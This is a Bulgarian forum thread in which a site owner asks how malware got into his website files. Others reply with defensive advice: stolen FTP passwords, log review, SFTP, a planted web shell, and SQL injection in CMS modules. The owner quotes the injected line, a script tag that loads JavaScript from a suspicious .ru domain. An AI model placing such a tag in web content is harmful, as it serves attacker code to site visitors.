Как пробиват вирусите в сайтовете?

[ivok]

Някой може ли да ме светне как успяват да си добавят код в моите файлове?!

Ето днес какво ми се лепна:

<script type="text/javascript" src="http://obscurewax.ru/Kbps.js"></script>

Ръчно ли влиза, автоматично ли?

Добре все пак, че AVG го засече и после ръчно си намерих къде се е "самонаписало", за да го изтрия.

Сега освен да се подменя паролите за достъп друго не се сещам. Ако някой има идея, може да каже.

 

[ivo.apostolov]

Re: Как пробиват вирусите в сайтовете?

Най-често през вирус на твоето ПЦ, смъкват ти паролите и от там влизат

 

[s1yf0x]

Re: Как пробиват вирусите в сайтовете?

За това си има логове - гледаш в кой файл ти е вируса и почваш един по един логовете на FTP, на apache (access-logs) и на cPanel в случай че ползваш хостинг със cPanel (това последното направо го ориентирай към съпорта) в 90% от случаите е през твоя компютър с крадена парола за FTP.

 

[cloxy]

Re: Как пробиват вирусите в сайтовете?

Крадат ти паролата през продупчения Windows или използваш некриптирана FTP връзка и някой "слуша". Най-вероятно първото

 

[ivok]

Re: Как пробиват вирусите в сайтовете?

Вкарало си е кода във всички индекс файлове и Javascript. Някой знае ли програма с която при зададена дума да я търси вътре във php и js файловете? Автоматично да става, без да отварям всеки един поотделно и да търся думата.

 

[johnny]

Re: Как пробиват вирусите в сайтовете?

Това на блог ли?

 

[yuliyan]

Re: Как пробиват вирусите в сайтовете?

прегледай си и директориите внимателно, че при мен бяха набутали и един Jackal, с цялата си наглост

 

[riko]

Re: Как пробиват вирусите в сайтовете?

Крадат ти паролата през продупчения Windows или използваш некриптирана FTP връзка и някой "слуша". Най-вероятно първото

Колега дай някакъв вариант за криптиране трафика при качването или свалянето през FTP на файлове от хостинги като рапидшаре и прочие(изключвам VPN)

 

[bgkulinar]

Re: Как пробиват вирусите в сайтовете?

SFTP?

 

[s1yf0x]

Re: Как пробиват вирусите в сайтовете?

Колега дай някакъв вариант за криптиране трафика при качването или свалянето през FTP на файлове от хостинги като рапидшаре и прочие(изключвам VPN)

WinSCP

 

[bgkulinar]

Re: Как пробиват вирусите в сайтовете?

WinSCP

A, ако е Линъкс юзър

 

[s1yf0x]

Re: Как пробиват вирусите в сайтовете?

A, ако е Линъкс юзър

man scp

 

[riko]

Re: Как пробиват вирусите в сайтовете?

Благодаря кой от двата е по надежден по отношение невъзможността да бъде засечен трафика ми от интернет провайдера или някой друг от моята Lan мрежа

А сега видях че двете се Фрии, и предназначението им е само да се прехвърлят сигурно файлове но никъде не видях способност за защита на трафика

 

[s1yf0x]

Re: Как пробиват вирусите в сайтовете?

Благодаря кой от двата е по надежден по отношение невъзможността да бъде засечен трафика ми от интернет провайдера или някой друг от моята Lan мрежа

А сега видях че двете се Фрии, и предназначението им е само да се прехвърлят сигурно файлове но никъде не видях способност за защита на трафика

Ти изобщо наясно ли си какво питаш - двете програми използват SSH и трафика е криптиран.

 

[riko]

Re: Как пробиват вирусите в сайтовете?

Идеята ми е ако сваля или кача 100GB от рапидшаре никой да не може да засече този трафик, особенно интернет провайдера ми

 

[s1yf0x]

Re: Как пробиват вирусите в сайтовете?

Идеята ми е ако сваля или кача 100GB от рапидшаре никой да не може да засече този трафик, особенно интернет провайдера ми

т.е. искаш те да НЕ ЗНАЯТ какво качваш и сваляш, или да НЕ ЗНАЯТ че правиш 100 ГБ трафик? АКо е воторото няма как да стане, все пак крайна точка е твоето IP. Но пък могат да "не успеят" да разберат точно какъв е трафика, ако пакетите са криптирани. Т.е. да не могат да разберат destination-а

 

[riko]

Re: Как пробиват вирусите в сайтовете?

И двете.

Точно така да не могат да разберат дестинацията подобно на VPN, логваш се в уебмастера и от там натък какво правиш, как го правиш и с кого го правиш остава мъгла.

Тези програми до каква степен покриват това?

 

[s1yf0x]

Re: Как пробиват вирусите в сайтовете?

И двете.

Точно така да не могат да разберат дестинацията подобно на VPN, логваш се в уебмастера и от там натък какво правиш, как го правиш и с кого го правиш остава мъгла.

Тези програми до каква степен покриват това?

С тази параноя най дорбе си вземи VPS+OpenVPN

 

[riko]

Re: Как пробиват вирусите в сайтовете?

Дай повече инфо за този Виртуален частен сървър и какво роля ще изиграе в комбинация с OpenVPN за постигане на целта ми

 

[cyberpower]

Re: Как пробиват вирусите в сайтовете?

Забравили сте да споменете най-често срещания начин за хакване на сайтовете, който е с sql инжексии, обикновено такъв достъп се добива от зле написани модулу към контент мениджмънт системите и обикновено целта е да се вкарат линкове с цел SEO най-често за виагра сайтове или да се зарази сайта с вирус. Мен лично на 2 пъти са ме хаквали по този начин и вече инсталирам само добре подържани модули и задължително упдейтвам.